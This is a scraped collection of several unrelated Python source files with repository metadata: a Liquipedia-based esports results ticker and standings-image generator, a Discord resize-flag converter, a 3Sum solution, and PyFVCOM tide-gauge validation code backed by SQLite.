        'format': "json",
        'Accept-Encoding': 'gzip'
    }
    # NOTE(review): stray no-op string statement left from an earlier
    # docstring; the real summary is at the top of the function.
    """ Parse a section of a page, fetch its table data and save it to a CSV file
    """
    try:
        res = S.get(url=URL, params=params, headers=HEADER)
        data = res.json()
        wikitext = data['parse']['wikitext']['*']
        lines = wikitext.split('|-')
        matches = []
        # rounds maps round name -> best-of value parsed from its header
        rounds = {}
        table = lines[0].split('==Results==')
        del table[0]
        # split the bracket into per-round/per-match chunks (|R1M1 etc.)
        table = re.split('\|R[0-9]', table[0])
        # prev_series tracks the previous match number; a reset to a lower
        # number signals the start of a new round
        prev_series = 100
        round_tracker = 0
        for series in table:
            if '{{bracket' not in series:
                if 'header' in series:
                    # round header carries the round name and its ({{...|N}})
                    # best-of value
                    header = series.split('=')[1].split('({{')
                    rounds[str(header[0])] = header[1].split('|')[1].replace('}})\n', '').split('\n')[0]
                elif re.search('M[0-9]', series):
                    round_keys = list(rounds.keys())
                    subseries = series.split(' ')
                    series_num = int(subseries[0].split('M')[1].split('=')[0])
                    # manual_score_flag: no explicit score= field, so count
                    # maps from per-map |winner= fields instead
                    manual_score_flag = False
                    p1_score = 0
                    p2_score = 0
                    for line in subseries:
                        if 'opponent1' in line:
                            if re.search('\|1=', line):
                                p1 = line.split('|1=')[-1].split('|')[0].replace('}}\n', '')
                            else:
                                p1 = line.split('|')[2].replace('}}\n', '')
                            if 'score' in line:
                                # NOTE(review): leaves p1_score as a str;
                                # str(p1_score) below tolerates it but any
                                # arithmetic would not — verify templates
                                p1_score = line.split('score=')[1].split('}')[0]
                            else:
                                manual_score_flag = True
                        elif 'opponent2' in line:
                            if re.search('\|1=', line):
                                p2 = line.split('|1=')[-1].split('|')[0].replace('}}\n', '')
                            else:
                                p2 = line.split('|')[2].replace('}}\n', '')
                            if 'score' in line:
                                p2_score = line.split('score=')[1].split('}')[0]
                            else:
                                manual_score_flag = True
                        if 'walkover=1' in line:
                            p1_score = 'W'
                            p2_score = 'L'
                        elif 'walkover=2' in line:
                            p1_score = 'L'
                            p2_score = 'W'
                        elif manual_score_flag and 'winner' in line:
                            winner_id = line.split('winner=')[1].split('}')[0].partition('|')
                            winner_id = winner_id[0]
                            if winner_id == '1':
                                p1_score += 1
                            elif winner_id == '2':
                                p2_score += 1
                    # match numbering restarted -> emit the next round's
                    # "| <Round> (BO n) :" separator
                    if series_num < prev_series and p1 != '':
                        key = str(round_keys[round_tracker])
                        matches.append('| ' + key + ' (BO ' + rounds[key] + ') :')
                        round_tracker += 1
                    if p1_score == '':
                        p1_score = '0'
                    if p2_score == '':
                        p2_score = '0'
                    if p1 == '' and p2 != '':
                        p1 = 'TBD'
                    if p2 == '' and p1 != '':
                        p2 = 'TBD'
                    if p1 != '':
                        if p1 != 'BYE' and p2 != 'BYE':
                            matches.append(' ' + p1 + ' ' + str(p1_score) + '-' + str(p2_score) + ' ' + p2 + ' ')
                        elif p1 == 'BYE':
                            matches.append(' ' + p2 + ' (Bye) ')
                        elif p2 == 'BYE':
                            matches.append(' ' + p1 + ' (Bye) ')
                    prev_series = series_num
        matchstr = ' '.join(matches)
        # once the quarterfinals exist, drop the (large) earlier rounds
        if 'Quarterfinals (BO 3)' in matchstr:
            matchstr = matchstr[matchstr.index('| Quarterfinals (BO 3)'):]
    except:
        # NOTE(review): bare except hides the real failure (bad page id,
        # network error, template drift) — consider narrowing and logging
        print('Invalid ID')
        matchstr = ''
    if prepend != '':
        prepend = ' | ' + prepend
        matchstr = prepend + matchstr
    # pad short tickers by repetition so the scroll loop has content
    while len(matchstr) < 100 and len(matchstr) != 0:
        matchstr += matchstr
    with codecs.open('results.txt', 'w', encoding="utf-8") as output:
        output.write(matchstr)
    print('Populated Results')
    # pause before the caller's next refresh — presumably for API rate
    # limiting; confirm against Liquipedia's API policy
    time.sleep(40)
def build_ticker_DH_EU_groups(pageid, prepend=''):
    """Build the scrolling results ticker for a DreamHack EU group stage.

    Unlike the NA variant, the EU groups live on separate transcluded
    {{Matchlist}} pages, so this fetches the parent page first, extracts the
    per-group page names, then fetches and parses each group page (with a
    40 s pause between requests).  Writes ticker text to 'results.txt' and
    renders one standings image per group.

    Parameters
    ----------
    pageid : int or str
        Liquipedia page id of the parent event page.
    prepend : str, optional
        Text inserted in front of the ticker contents.
    """
    # TODO: Generalize function to all events
    # TODO: convert match_list to dictionary so we can bump less useful results
    # TODO: convert match_list to dictionary so we can bump less useful results
    # TODO: add gui to plug in pageid
    # TODO: loop every 30s to reduce user overhead
    params = {
        'action': "parse",
        'pageid': pageid,
        'prop': 'wikitext',
        'format': "json",
        'Accept-Encoding': 'gzip'
    }
    # NOTE(review): stray no-op string statement left from an earlier
    # docstring; the real summary is at the top of the function.
    """ Parse a section of a page, fetch its table data and save it to a CSV file
    """
    res = S.get(url=URL, params=params, headers=HEADER)
    data = res.json()
    wikitext = data['parse']['wikitext']['*']
    lines = wikitext.split('|-')
    matches = []
    rounds = {}
    lines = lines[-1]
    lines = lines.split('Toggle group')[1]
    group_table = lines.split('{{:')
    # each {{Matchlist|...}} names one transcluded group page
    new_groups = group_table[0].split('{{Matchlist')
    group_names = [x.split('}')[0] for x in new_groups[1:len(new_groups)]]
    prev_series = 100
    round_tracker = 0
    matches = {}
    for group in group_names:
        print(group)
        # pause between page fetches — presumably for Liquipedia API rate
        # limits; confirm against their API policy
        time.sleep(40)
        HEADER_GROUPS = {'User-Agent': f'Live Match Results Ticker {group} (beomulf@gmail.com)'}
        group_params = {
            'action': "parse",
            'page': group,
            'prop': 'wikitext',
            'format': "json",
            'Accept-Encoding': 'gzip'
        }
        res = S.get(url=URL, params=group_params, headers=HEADER_GROUPS)
        data = res.json()
        wikitext = data['parse']['wikitext']['*']
        lines = wikitext.split('|-')
        group_data = lines[-1]
        # participant names appear as |p1=..., |p2=..., etc.
        player_names = re.split('\|p[0-9]=', group_data)
        del player_names[0]
        # if 'bg' in group:
        #     player_names = re.split('\|p[0-9]=', group_data)
        player_names_list = [x.split('\n')[0].split('=') for x in player_names[0:8]]
        player_names_list = [x[0] for x in player_names_list]
        results_dict = dict.fromkeys(player_names_list)
        for key in player_names_list:
            results_dict[key] = {'Map Diff': 0, 'Map Wins': 0, 'Map Losses': 0, 'Match Wins': 0, 'Match Losses': 0}
        table = re.split('\|M[0-9]|<', group_data)
        for match in table:
            if '{{HiddenSort' in match:
                group_name = match.split('|')[1].split('}}')[0] + ' | '
                matches[group_name] = []
            elif 'header' not in match and 'opponent1' in match:
                # bestof=5 marks the playoff section; stop tallying
                if 'bestof=5' in match:
                    break
                date_info = match.split('|')
                date = [x for x in date_info if 'date' in x]
                date = date[0].split('=')[1].split('{{')
                # strip template cruft from the timezone half of the date
                date = date[0] + re.sub('[a-z |{|}|\/]', '', date[1]).replace('\n', '')
                date = date.replace('A', '')
                for zone, offset in TIMEZONES.items():
                    try:
                        date = date.replace(zone, offset)
                    except:
                        # NOTE(review): str.replace never raises, so this
                        # handler is unreachable
                        print('Invalid Timezone')
                date = parser.parse(date)
                currentTime = datetime.datetime.now(datetime.timezone.utc).astimezone()
                timeDiff = abs(currentTime - date)
                # age of the match in whole hours
                timeDiff = timeDiff.days * 24 + timeDiff.seconds // 3600
                subseries = match.split(' ')
                # manual_score_flag: no explicit score= field, so count maps
                # from per-map |winner= fields instead
                manual_score_flag = False
                p1_score = 0
                p2_score = 0
                for line in subseries:
                    if 'opponent1' in line:
                        if re.search('\|1=', line):
                            p1 = line.split('|1=')[-1].split('|')[0].replace('}}\n', '')
                        else:
                            p1 = line.split('|')[2].replace('}}\n', '').split('p1=')[1]
                        if 'score' in line:
                            # NOTE(review): this leaves p1_score as a str; the
                            # arithmetic below would then raise TypeError —
                            # presumably these templates normally omit score=
                            # so the int path runs; verify against live data
                            p1_score = line.split('score=')[1].split('}')[0]
                        else:
                            manual_score_flag = True
                    elif 'opponent2' in line:
                        if re.search('\|1=', line):
                            p2 = line.split('|1=')[-1].split('|')[0].replace('}}\n', '')
                        else:
                            p2 = line.split('|')[2].replace('}}\n', '').split('p1=')[1]
                        if 'score' in line:
                            p2_score = line.split('score=')[1].split('}')[0]
                        else:
                            manual_score_flag = True
                    if 'walkover=1' in line:
                        p1_score = 'W'
                        p2_score = 'L'
                    elif 'walkover=2' in line:
                        p1_score = 'L'
                        p2_score = 'W'
                    elif manual_score_flag and 'winner' in line:
                        winner_id = line.split('winner=')[1].split('}')[0].partition('|')
                        winner_id = winner_id[0]
                        if winner_id == '1':
                            p1_score += 1
                        elif winner_id == '2':
                            p2_score += 1
                if p1_score == '':
                    p1_score = '0'
                if p2_score == '':
                    p2_score = '0'
                # NOTE(review): unlike the NA variant there is no guard for
                # players missing from results_dict — a substitute not in the
                # |p1=..|p8= header would raise KeyError here; verify
                results_dict[p1]['Map Wins'] += p1_score
                results_dict[p2]['Map Wins'] += p2_score
                results_dict[p1]['Map Losses'] += p2_score
                results_dict[p2]['Map Losses'] += p1_score
                results_dict[p1]['Map Diff'] += p1_score-p2_score
                results_dict[p2]['Map Diff'] += p2_score-p1_score
                # a best-of-3 match is decided once either side reaches 2
                if p1_score >= 2 or p2_score >= 2:
                    if p1_score > p2_score:
                        results_dict[p1]['Match Wins'] += 1
                        results_dict[p2]['Match Losses'] += 1
                    if p2_score > p1_score:
                        results_dict[p2]['Match Wins'] += 1
                        results_dict[p1]['Match Losses'] += 1
                # only matches from the last 8 hours go into the ticker
                if timeDiff < 8:
                    if p1 != '':
                        if p1 != 'BYE' and p2 != 'BYE':
                            matches[group_name].append(' ' + p1 + ' ' + str(p1_score) + '-' + str(p2_score) + ' ' + p2 + ' ')
                        elif p1 == 'BYE':
                            matches[group_name].append(' ' + p2 + ' (Bye) ')
                        elif p2 == 'BYE':
                            matches[group_name].append(' ' + p1 + ' (Bye) ')
                if p1 == '':
                    p1 = 'TBD'
                if p2 == '':
                    p2 = 'TBD'
        generate_group_standings_img(group_name, results_dict)
    matchstr = ''
    for key in matches.keys():
        if matches[key] != []:
            matchstr += key + ''.join(matches[key])
    if prepend != '':
        matchstr = ' | ' + prepend + ' | ' + matchstr
    with open('results.txt', 'w') as output:
        output.write(matchstr)
    print('Populated Results')
def build_kob_ticker(mainstream_group='', offstream_group=''):
    """
    Query the King of Battles Google Sheet and return its worksheet names.

    Parameters
    ----------
    mainstream_group : str, optional
        Group shown on the main stream.  When empty (the default) the
        function returns the spreadsheet's worksheet titles and does
        nothing else.
    offstream_group : str, optional
        Group shown off-stream.  Currently unused.

    Returns
    -------
    list or None
        Worksheet titles when ``mainstream_group`` is empty; otherwise
        ``None`` — building the ticker for a specific group is not yet
        implemented (TODO).
    """
    SCOPES = ['https://www.googleapis.com/auth/spreadsheets']
    SPREADSHEET_ID = '1TX2a7CHmrJaaNvytF_iVUGPAD9ALnRhIJXrVjJelTDk'
    creds = None
    # Re-use cached OAuth credentials when present, refreshing if expired;
    # otherwise run the interactive browser flow and cache the result.
    if os.path.exists('token.pickle'):
        with open('token.pickle', 'rb') as token:
            creds = pickle.load(token)
    if not creds or not creds.valid:
        if creds and creds.expired and creds.refresh_token:
            creds.refresh(Request())
        else:
            flow = InstalledAppFlow.from_client_secrets_file(
                '../KoB_Toolsuite/credentials.json', SCOPES)  # downloaded OAuth client JSON
            creds = flow.run_local_server(port=8080)
        with open('token.pickle', 'wb') as token:
            pickle.dump(creds, token)
    service = build('sheets', 'v4', credentials=creds)
    # Fetch the spreadsheet's metadata (worksheet list) via the Sheets API.
    sheet = service.spreadsheets()
    result_input = sheet.get(spreadsheetId=SPREADSHEET_ID).execute()
    sheets = result_input.get('sheets', '')
    sheet_names = [x.get("properties", {}).get("title") for x in sheets]
    if mainstream_group == '':
        return sheet_names
def generate_group_standings_img(group_name, results_dict):
    """
    Render two transparent 1920x1080 standings overlays for one group and
    save them as PNGs in the working directory.

    The first image ('<Group>.png') is a sidebar-style table drawn at fixed
    coordinates matching the stream overlay artwork; the second
    ('<Group>_FullScreen.png') is a full-screen table.

    Parameters
    ----------
    group_name : str
        Group label; text before the first '|' (spaces removed) becomes the
        output filename prefix.
    results_dict : dict
        Per-player stats: name -> {'Map Diff', 'Map Wins', 'Map Losses',
        'Match Wins', 'Match Losses'}.
        NOTE(review): the sidebar image indexes ranks 0..7, so this assumes
        exactly 8 players — confirm upstream always supplies 8.
    """
    img = Image.new('RGBA', (1920, 1080), color=(0, 0, 0, 0))
    img2 = Image.new('RGBA', (1920, 1080), color=(0, 0, 0, 0))
    fnt = ImageFont.truetype('Roboto-Bold.ttf', size=30)
    d = ImageDraw.Draw(img)
    d2 = ImageDraw.Draw(img2)
    # Ascending sort by (match diff, map diff, map wins): the LAST entry is
    # the group leader.
    ordered_results = sorted(results_dict, key=lambda x: (results_dict[x]['Match Wins'] - results_dict[x]['Match Losses'],
                                                          results_dict[x]['Map Diff'],
                                                          results_dict[x]['Map Wins']))
    # Sidebar row coordinates (top row = best player).  The vertical spacing
    # is slightly irregular to line up with the overlay artwork, so the
    # original hand-placed values are kept verbatim.
    name_ys = (370, 415, 457, 501, 545, 590, 635, 675)
    score_ys = (375, 420, 464, 509, 553, 597, 640, 683)
    for row, (name_y, score_y) in enumerate(zip(name_ys, score_ys)):
        player = ordered_results[7 - row]
        stats = results_dict[player]
        # Player name
        d.text((1260, name_y), player, font=fnt, fill=(255, 255, 255))
        # Match score
        d.text((1620, score_y),
               str(stats['Match Wins']) + ' - ' + str(stats['Match Losses']),
               font=fnt, fill=(255, 255, 255), anchor='mt')
        # Map score
        d.text((1820, score_y),
               str(stats['Map Wins']) + ' - ' + str(stats['Map Losses']),
               font=fnt, fill=(255, 255, 255), anchor='mt')
    img.save(group_name.split('|')[0].replace(' ', '') + '.png')
    # Full-screen layout: evenly spaced rows, 50 px apart, worst player at
    # the bottom start position.
    fullscreen_start = 300
    score_start = 640
    maps_start = 815
    name_vert_start = 730
    num_vert_start = 735
    for counter, result in enumerate(ordered_results):
        d2.text((fullscreen_start, name_vert_start - counter * 50), result, font=fnt, fill=(255, 255, 255))
        d2.text((score_start, num_vert_start - counter * 50),
                str(results_dict[result]['Match Wins']) + ' - ' + str(results_dict[result]['Match Losses']),
                font=fnt,
                fill=(255, 255, 255),
                anchor='mt')
        d2.text((maps_start, num_vert_start - counter * 50),
                str(results_dict[result]['Map Wins']) + ' - ' + str(results_dict[result]['Map Losses']),
                font=fnt,
                fill=(255, 255, 255),
                anchor='mt')
    img2.save(group_name.split('|')[0].replace(' ', '') + '_FullScreen.png')
| Peragore/BeoCastingTools | build_ticker.py | build_ticker.py | py | 25,854 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "requests.Session",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 66,
... |
31149492786 | from enum import Enum
from typing import Optional
from discord.ext import commands
from .utils import ASPECT_RATIO_ORIGINAL
class ResizeFlagDescriptions(Enum):
    """Help-text strings for the flags accepted by the resize command.

    Each member's value is the user-facing description referenced by
    ``ResizeFlags`` when declaring its flags.
    """

    height = "Flag to specify height."
    width = "Flag to specify width."
    aspect_ratio = f"Flag to specify width:height aspect ratio when resizing. \
        Pass either of `{', '.join(ASPECT_RATIO_ORIGINAL)}` to retain the original aspect ratio of file(s). \
        If either height/width flag is passed, it will resized based on it, but will not work if both are passed. \
        If neither is specified, it will use the original width to resize the height."
    # The following had no placeholders, so the redundant f-prefixes were
    # dropped; the string values are unchanged.
    fit = "Flag `(yes/true)` to specify if you want the bot to fit the image to the edges by cropping away transparent surrounding areas."
    center = "Flag `(yes/true)` to specify if you want to resize image(s)' background while keeping the image centered and unwarped."
    crop = "Flag `(yes/true)` to specify if you want the bot to crop your image when resizing."
class ResizeFlags(
    commands.FlagConverter, prefix="--", delimiter=" ", case_insensitive=True
):
    """Flag set for the resize command, parsed from `--flag value` pairs.

    All flags are optional, limited to one occurrence each, and documented
    via :class:`ResizeFlagDescriptions`.
    """

    # Target height in pixels (alias: --h).
    height: Optional[int] = commands.flag(
        aliases=("h",), max_args=1, description=ResizeFlagDescriptions.height.value
    )
    # Target width in pixels (alias: --w).
    width: Optional[int] = commands.flag(
        aliases=("w",), max_args=1, description=ResizeFlagDescriptions.width.value
    )
    # Width:height aspect ratio string (alias: --ar).
    ar: Optional[str] = commands.flag(
        name="aspect_ratio",
        aliases=("ar",),
        max_args=1,
        description=ResizeFlagDescriptions.aspect_ratio.value,
    )
    # Crop away transparent borders to fit the image to its edges.
    fit: Optional[bool] = commands.flag(
        name="fit", max_args=1, description=ResizeFlagDescriptions.fit.value
    )
    # Resize the background while keeping the image centered and unwarped.
    center: Optional[bool] = commands.flag(
        name="center",
        aliases=("centre",),
        max_args=1,
        description=ResizeFlagDescriptions.center.value,
    )
    # Allow cropping the image during the resize.
    crop: Optional[bool] = commands.flag(
        name="crop", max_args=1, description=ResizeFlagDescriptions.crop.value
    )
| WitherredAway/Yeet | cogs/Image/utils/flags.py | flags.py | py | 1,959 | python | en | code | 16 | github-code | 1 | [
{
"api_name": "enum.Enum",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "utils.ASPECT_RATIO_ORIGINAL",
"line_number": 13,
"usage_type": "argument"
},
{
"api_name": "discord.ext.commands.FlagConverter",
"line_number": 22,
"usage_type": "attribute"
},
{
"... |
21007477247 | # -*- coding: utf-8 -*-
"""
Created on Sun Feb 14 18:50:22 2021
@author: Cillian
"""
import numpy as np
from pyDOE import lhs
def get_initial_pts(parameter_samples, parameter_ranges, criteria='center'):
    """Get initial Latin Hypercube sample points and scale them to ranges.

    Args:
        parameter_samples (int): Number of samples required
        parameter_ranges (list of lists): Each inner list contains the range of
            a parameter [upper bound, lower bound]
        criteria (str, optional): Latin Hypercube sampling criterion passed
            through to ``pyDOE.lhs`` (e.g. 'center', 'maximin')

    Returns:
        numpy array of shape (parameter_samples, len(parameter_ranges)) with
        each column scaled from the unit interval to its parameter range
    """
    n_parameters = len(parameter_ranges)
    # lhs returns points in the unit hypercube [0, 1]^n
    sample_pts = lhs(n_parameters, samples=parameter_samples, criterion=criteria)
    # Rescale each column from [0, 1] to [lower, upper]
    for column, (upper, lower) in enumerate(parameter_ranges):
        sample_pts[:, column] = sample_pts[:, column] * (upper - lower) + lower
    return sample_pts
def get_grid_points(M, p_range=((0.01, 0.002), (0.001, 0.0001), (0.1, 0.01), (0.2, 0.1))):
    """Discretise the input domain into a regular grid.

    Generalised from the original hard-coded Grey-Scott bounds (the file's
    own TODO): the default ``p_range`` reproduces the original (DA, DB, k, f)
    grid exactly, and bounds use the same [upper, lower] convention as
    ``obtain_samples_GS``.

    Args:
        M (int): Number of equally spaced points to use for each parameter
        p_range (sequence of pairs, optional): (upper, lower) bounds per
            parameter; defaults to the Grey-Scott bounds

    Returns:
        np array with shape (M ** len(p_range), len(p_range)); the first
        parameter varies slowest and the last varies fastest, matching the
        original nested-loop row ordering
    """
    axes = [np.linspace(lower, upper, M) for upper, lower in p_range]
    # indexing='ij' plus C-order ravel makes the last axis vary fastest,
    # which reproduces the original nested-for ordering of rows
    mesh = np.meshgrid(*axes, indexing='ij')
    return np.stack([component.ravel() for component in mesh], axis=1)
def obtain_samples_GS(M, p_range = [[0.01,0.002], [0.001,0.0001],[0.1,0.01],[0.2,0.1]]):
    """Draw M uniform random samples for each Grey-Scott input parameter.

    Args:
        M (int): Number of samples required
        p_range (list of lists): Each inner list contains the range of
            a parameter [upper bound, lower bound]

    Returns:
        np array of shape (len(p_range), M): one row of uniform draws per
        parameter (DA, DB, k, f)
    """
    # Draw in the same parameter order the ranges are listed (DA, DB, k, f)
    draws = [np.random.uniform(lower, upper, M) for upper, lower in p_range]
    return np.array(draws)
| CillianHourican/CLS-Project | Deliverable 1/utils.py | utils.py | py | 2,294 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "pyDOE.lhs",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "numpy.empty",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_numbe... |
71015824995 | # Title: 3Sum
# Link: https://leetcode.com/problems/3sum/
from itertools import combinations
from collections import defaultdict
class Solution:
    """Solver for LeetCode 15 (3Sum) using value counts instead of the usual
    sort/two-pointer scan."""

    def three_sum(self, nums: list) -> set:
        """Return all unique triplets of values in ``nums`` that sum to zero.

        Args:
            nums: list of integers (may be empty, may contain duplicates).

        Returns:
            set of 3-tuples, each sorted ascending, whose elements sum to 0.
        """
        ans = set()
        seen_pairs = set()
        counts = defaultdict(lambda: 0)
        for n in nums:
            counts[n] += 1
        distinct = sorted(counts.keys())
        # Case 1: three distinct values a < b and third = -a-b.
        for a, b in combinations(distinct, 2):
            if (a, b) in seen_pairs:
                # A pair uniquely determines its third element, and this pair
                # already belongs to a recorded triplet — skip the recompute.
                continue
            # Temporarily consume one copy of a and b so the membership test
            # on the third value respects multiplicities.
            counts[a] -= 1
            counts[b] -= 1
            if counts[-a - b]:
                s = sorted([a, b, -a - b])
                ans.add(tuple(s))
                seen_pairs.add((s[0], s[1]))
                seen_pairs.add((s[0], s[2]))
                seen_pairs.add((s[1], s[2]))
            counts[a] += 1
            counts[b] += 1
        # Case 2: two (or three) equal values a, a with third = -2a.
        for a in distinct:
            if counts[a] >= 2:
                if a > 0:
                    t = (-a - a, a, a)
                else:
                    t = (a, a, -a - a)
                if t not in ans:
                    counts[a] -= 2
                    if counts[-a - a] > 0:
                        ans.add(t)
                    # BUG FIX: restore the count; the original left it
                    # decremented, corrupting later iterations (e.g. the
                    # triplet (-2, 1, 1) was lost for [1, 1, -2, -2, 4]).
                    counts[a] += 2
        return ans
def main():
    """Demo entry point: print the zero-sum triplets for a sample input."""
    print(Solution().three_sum([-1, 0, 1, 2, -1, -4]))


if __name__ == '__main__':
    main()
{
"api_name": "collections.defaultdict",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "itertools.combinations",
"line_number": 18,
"usage_type": "call"
}
] |
3584234188 | import numpy as np
import sqlite3 as sq
import datetime as dt
import subprocess as sp
import glob as gb
import os
import matplotlib.pyplot as plt
from PyFVCOM.grid import vincenty_distance
from PyFVCOM.read import FileReader
from PyFVCOM.plot import Time, Plotter
from PyFVCOM.stats import calculate_coefficient, rmse
SQL_UNIX_EPOCH = dt.datetime(1970, 1, 1, 0, 0, 0)
"""
Validation of model outputs against in situ data stored and extracted from a database.
This also includes the code to build the databases of time series data sets.
"""
class validation_db():
""" Work with an SQLite database. """
def __init__(self, db_name):
if db_name[-3:] != '.db':
db_name += '.db'
self.conn = sq.connect(db_name)
self.create_table_sql = {}
self.retrieve_data_sql = {}
self.c = self.conn.cursor()
def execute_sql(self, sql_str):
"""
Execute the given SQL statement.
Parameters
----------
sql_str : str
SQL statement to execute.
Returns
-------
results : np.ndarray
Data from the database which matches the SQL statement.
"""
self.c.execute(sql_str)
return self.c.fetchall()
def make_create_table_sql(self, table_name, col_list):
"""
Create an SQL table if no such table exists.
Parameters
----------
table_name : str
Table name to create.
col_list : list
List of column names to add to the table.
"""
create_str = 'CREATE TABLE IF NOT EXISTS ' + table_name + ' ('
for this_col in col_list:
create_str += this_col
create_str += ', '
create_str = create_str[0:-2]
create_str += ');'
self.create_table_sql['create_' + table_name] = create_str
def insert_into_table(self, table_name, data):
"""
Insert data into a table.
Parameters
----------
table_name : str
Table name into which to insert the given data.
data : np.ndarray
Data to insert into the database.
"""
no_rows = len(data)
no_cols = len(data[0])
qs_string = '('
for this_x in range(no_cols):
qs_string += '?,'
qs_string = qs_string[:-1]
qs_string += ')'
if no_rows > 1:
self.c.executemany('insert or ignore into ' + table_name + ' values ' + qs_string, data)
elif no_rows == 1:
self.c.execute('insert into ' + table_name + ' values ' + qs_string, data[0])
self.conn.commit()
def select_qry(self, table_name, where_str, select_str='*', order_by_str=None, inner_join_str=None, group_by_str=None):
"""
Extract data from the database which matches the given SQL query.
Parameters
----------
table_name : str
Table name to query.
where_str : str
Where statement.
select_str : str, optional
Optionally give a set of columns to select.
order_by_str : str, optional
Optionally give a set of columns by which to order the results.
inner_join_str : str, optional
Optionally give an inner join string.
group_by_str : str, optional
Optionally give a string by which to group the results.
Returns
-------
results : np.ndarray
The data which matches the given query.
"""
qry_string = 'select ' + select_str + ' from ' + table_name
if inner_join_str:
qry_string += ' inner join ' + inner_join_str
if where_str:
qry_string += ' where ' + where_str
if order_by_str:
qry_string += ' order by ' + order_by_str
if group_by_str:
qry_string += ' group by ' + group_by_str
return self.execute_sql(qry_string)
def close_conn(self):
    """ Close the connection to the database. No further queries are possible afterwards. """
    self.conn.close()
def dt_to_epochsec(time_to_convert):
    """
    Convert a datetime to our SQL database epoch.

    Parameters
    ----------
    time_to_convert : datetime.datetime
        Datetime to convert.

    Returns
    -------
    epoched : float
        Converted datetime (in seconds since SQL_UNIX_EPOCH). Note
        total_seconds() returns a float, not an int; callers which need an
        integer (e.g. for the time_int column) cast explicitly.
    """
    # SQL_UNIX_EPOCH is the module-level reference datetime for the database.
    return (time_to_convert - SQL_UNIX_EPOCH).total_seconds()
def epochsec_to_dt(time_to_convert):
    """
    Convert seconds in the SQL database epoch back to a datetime.

    Parameters
    ----------
    time_to_convert : int
        Seconds in the SQL database epoch.

    Returns
    -------
    unepoched : datetime.datetime.
        Converted time.
    """
    return SQL_UNIX_EPOCH + dt.timedelta(seconds=time_to_convert)
def plot_map(fvcom, tide_db_path, threshold=np.inf, legend=False, **kwargs):
    """
    Plot the tide gauges which fall within the model domain (in space and time) defined by the given FileReader object.

    Parameters
    ----------
    fvcom : PyFVCOM.read.FileReader
        FVCOM model data as a FileReader object.
    tide_db_path : str
        Path to the tidal database.
    threshold : float, optional
        Give a threshold distance (in spherical units) beyond which a gauge is considered too far away.
    legend : bool, optional
        Set to True to add a legend to the plot. Defaults to False.

    Any remaining keyword arguments are passed to PyFVCOM.plot.Plotter.

    Returns
    -------
    plot : PyFVCOM.plot.Plotter
        The Plotter object instance for the map
    """
    tide_db = db_tide(tide_db_path)
    gauge_names, gauge_locations = tide_db.get_gauge_locations(long_names=True)
    gauges_in_domain = []
    fvcom_nodes = []
    for gi, gauge in enumerate(gauge_locations):
        river_index = fvcom.closest_node(gauge, threshold=threshold)
        if river_index:
            gauge_id, gauge_dist = tide_db.get_nearest_gauge_id(*gauge)
            times, data = tide_db.get_tidal_series(gauge_id, np.min(fvcom.time.datetime), np.max(fvcom.time.datetime))
            # Skip gauges with no data within the model period.
            if not np.any(data):
                continue
            gauges_in_domain.append(gi)
            fvcom_nodes.append(river_index)
    plot = Plotter(fvcom, **kwargs)
    fx, fy = plot.m(fvcom.grid.lon, fvcom.grid.lat)
    plot.plot_field(-fvcom.grid.h)
    plot.axes.plot(fx[fvcom_nodes], fy[fvcom_nodes], 'ro', markersize=3, zorder=202, label='Model')
    # Add the gauge locations. Bug fix: only plot the gauges which passed the
    # domain/data checks above so the plotted positions line up with the
    # plotted names (previously all gauge positions were zipped against the
    # in-domain names only, mislabelling the markers).
    in_domain = gauge_locations[gauges_in_domain]
    rx, ry = plot.m(in_domain[:, 0], in_domain[:, 1])
    plot.axes.plot(rx, ry, 'wo', label='Gauges')
    for xx, yy, name in zip(rx, ry, gauge_names[gauges_in_domain]):
        plot.axes.text(xx, yy, name, fontsize=10, rotation=45, rotation_mode='anchor', zorder=203)
    if legend:
        plot.axes.legend(numpoints=1, scatterpoints=1, ncol=2, loc='upper center', fontsize=10)
    return plot
def plot_tides(fvcom, db_name, threshold=500, figsize=(10, 10), **kwargs):
    """
    Plot model and tide gauge data.

    Parameters
    ----------
    fvcom : PyFVCOM.read.FileReader
        FVCOM model data as a FileReader object.
    db_name : str
        Database name to interrogate.
    threshold : float, optional
        Give a threshold distance (in spherical units) to exclude gauges too far from a model node.
    figsize : tuple
        Give a figure size (units are inches).

    Remaining keyword arguments are passed to PyFVCOM.plot.Time.

    Returns
    -------
    time : PyFVCOM.plot.Time
        Time series plot object (None if no gauges matched the model domain).
    gauge_obs : dict
        Dictionary with the gauge and model data.
    """
    tide_db = db_tide(db_name)
    # Get all the gauges in the database and find the corresponding model nodes.
    gauge_names, gauge_locations = tide_db.get_gauge_locations(long_names=True)
    gauge_obs = {}
    gauges_in_domain = []
    fvcom_nodes = []
    for gi, gauge in enumerate(gauge_locations):
        river_index = fvcom.closest_node(gauge, threshold=threshold)
        if river_index:
            current_gauge = {}
            current_gauge['gauge_id'], current_gauge['gauge_dist'] = tide_db.get_nearest_gauge_id(*gauge)
            current_gauge['times'], current_gauge['data'] = tide_db.get_tidal_series(current_gauge['gauge_id'],
                                                                                    np.min(fvcom.time.datetime),
                                                                                    np.max(fvcom.time.datetime))
            if not np.any(current_gauge['data']):
                continue
            current_gauge['lon'], current_gauge['lat'] = gauge_locations[gi, :]
            # Flag value 0 marks data which passed QC; keep only those points.
            current_gauge['gauge_clean'] = current_gauge['data'][:, 1] == 0
            current_gauge['gauge_obs_clean'] = {'times': np.copy(current_gauge['times'])[current_gauge['gauge_clean']],
                                                'data': np.copy(current_gauge['data'])[current_gauge['gauge_clean'], 0]}
            # Remove the mean from model and observations so anomalies are compared.
            current_gauge['rescale_zeta'] = fvcom.data.zeta[:, river_index] - np.mean(fvcom.data.zeta[:, river_index])
            current_gauge['rescale_gauge_obs'] = current_gauge['gauge_obs_clean']['data'] - np.mean(current_gauge['gauge_obs_clean']['data'])
            current_gauge['dates_mod'] = np.isin(fvcom.time.datetime, current_gauge['gauge_obs_clean']['times'])
            current_gauge['dates_obs'] = np.isin(current_gauge['gauge_obs_clean']['times'], fvcom.time.datetime)
